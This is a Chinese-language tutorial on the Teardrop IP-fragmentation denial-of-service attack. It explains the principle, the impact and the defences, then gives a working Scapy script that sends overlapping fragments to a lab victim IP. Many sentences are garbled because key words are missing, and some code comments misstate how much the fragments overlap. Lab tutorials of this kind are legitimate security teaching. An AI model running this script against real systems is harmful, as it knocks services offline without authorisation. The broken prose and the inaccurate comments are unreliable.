利用 Scapy 库编写 Teardrop 脚本

一、介绍

Teardrop是一种历史上比较著名的拒绝服务（Denial of Service, DoS），主要利用了IP数据包分片和重组过程中的来目标系统。以下是对Teardrop的详细介绍：

1.1 原理

IP协议允许数据包在传输过程中进行分片，以适应不同网络的 MTU（最大传输单元）限制。接收端需要将这些分片的数据包重新组装成完整的数据包。然而，Teardrop攻击通过发送畸形的、重叠的或不正确的分片数据包，利用接收端在重组这些分片时的，导致系统崩溃或重启。

1.2 步骤

1. 数据包分片：

• 正常情况下，数据包在传输过程中可能被分片。例如，一个大的IP数据包被分成多个较小的分片，每个分片包含部分数据和分片信息（如偏移量和标志位）。

1. 畸形分片：

• 发送特意构造的畸形分片数据包。这些分片在偏移量字段中包含重叠或错误的偏移信息，使得接收端在重组数据包时发生错误。

1. 重组失败：

• 当目标系统尝试重组这些畸形分片时，由于分片信息不正确或重叠，系统无法正确处理这些分片，导致内存错误、系统崩溃或重启。

1.3 影响

• 系统崩溃：

• 目标系统可能会因为无法正确处理畸形分片而崩溃，导致服务中断。

• 重启或蓝屏：
  

• 在Windows 95、Windows NT等旧版本操作系统中，Teardrop常导致系统重启或出现蓝屏死机（BSOD）。

• 拒绝服务：

• 系统崩溃或重启会导致服务不可用，攻击者通过这种方式实现拒绝服务。

1.4 背景

Teardrop攻击在20世纪90年代末首次被发现，当时许多操作系统（如Windows 95、Windows NT、Linux内核的某些版本等）存在处理IP分片重组时的。这些在当时被广泛利用，导致大量系统受到。

1.5 防御措施

1. 操作系统更新：

• 及时更新操作系统和网络设备的固件，以修补处理IP分片重组的漏洞。现代操作系统和网络设备通常已经修复了这种。

2. 入侵检测和防御系统（IDS/IPS）：

• 部署入侵检测系统（IDS）和入侵防御系统（IPS），实时监控网络流量，检测和阻止异常分片数据包。

1. 防火墙：

• 配置防火墙规则，过滤畸形或异常的IP分片数据包，防止这些数据包到达内部网络和系统。

2. 流量分析工具：

• 使用流量分析工具检测和分析网络中的异常流量模式，识别潜在的Teardrop。

1. 网络分段：

• 通过网络分段和VLAN（虚拟局域网）技术，将网络划分为多个子网，限制攻击范围和影响。

1.6 示例

以下是Teardrop的一个简化示例：

1. 正常分片：

• 数据包1：偏移量0，长度100
• 数据包2：偏移量100，长度100
• 数据包3：偏移量200，长度100

1. 畸形分片：

• 数据包1：偏移量0，长度100
• 数据包2：偏移量50，长度100
• 数据包3：偏移量150，长度100

在上述畸形分片中，数据包2的偏移量和长度导致其与数据包1重叠，数据包3的偏移量和长度也与前两个数据包部分重叠，接收端在重组这些分片时会发生错误。

1.7 总结

Teardrop攻击是一种利用IP分片重组漏洞进行拒绝服务的方式。尽管现代操作系统和网络设备通常已经修复了相关，但了解这种攻击方式对于理解网络安全和历史仍然非常重要。通过及时更新系统、部署安全设备和监控网络流量，可以有效防御此类。

二、实验环境

受害者：192.168.1.128

三、实操演示

攻击者：192.168.1.103

from scapy.all import *
from scapy.layers.inet import UDP
 
# 目标IP地址
target_ip = "192.168.1.128"
 
# 第一个分片：偏移量为0，8字节数据
fragment1 = IP(dst=target_ip, id=42, flags="MF", frag=0)/UDP(sport=12345, dport=80)/("X"*8)
 
# 第二个分片：偏移量为1（8字节），8字节数据，覆盖第1个分片的最后1字节
fragment2 = IP(dst=target_ip, id=42, flags="MF", frag=1)/("Y"*8)
 
# 第三个分片：偏移量为2（16字节），8字节数据，覆盖第2个分片的最后1字节
fragment3 = IP(dst=target_ip, id=42, flags="MF", frag=2)/("Z"*8)
 
# 第四个分片：偏移量为3（24字节），8字节数据，覆盖第3个分片的最后1字节
fragment4 = IP(dst=target_ip, id=42, frag=3)/("W"*8)
 
# 发送恶意分片
send(fragment1)
send(fragment2)
send(fragment3)
send(fragment4)
print('发送完毕！')

第一个数据包中能发现大小为 16 字节，有分片，偏移量为 0

第二个数据包中偏移量为 8，并不是 16，意味着重叠了

计算过程：上一包的大小 + 偏移量 = 下一包的偏移量（如果不懂的可以再去看看我在网络协议分析中写的 IP 协议分片一章）